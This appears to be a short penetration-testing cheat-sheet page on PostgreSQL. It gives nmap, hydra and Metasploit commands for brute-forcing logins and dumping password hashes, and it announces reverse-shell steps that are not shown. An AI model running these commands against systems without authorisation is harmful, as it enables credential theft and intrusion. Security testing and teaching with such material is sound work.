Page cover

PostgreSQL Pentesting

PostgreSQL a relational database management system. Default port is 5432.

nmap --script pgsql-brute -p 5432 <target-ip>
Copied!

hydra -l username -P passwords.txt <target-ip> postgres
hydra -L usernames.txt -p password <target-ip> postgres

# Metasploit
msfconsole
msf> use auxiliary/scanner/postgres/postgres_login
msf> set rhosts <target-ip>
msf> run
Copied!

msfconsole
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run
Copied!

Also we may find other locations by viewing environment variables. They are prefixed by PG.

To execute arbitrary command, do the following steps. We’ll perform Reverse Shell. Of course we have to start a listener (e.g. nc -lvnp 4444) in local machine beforehand.

References

Last updated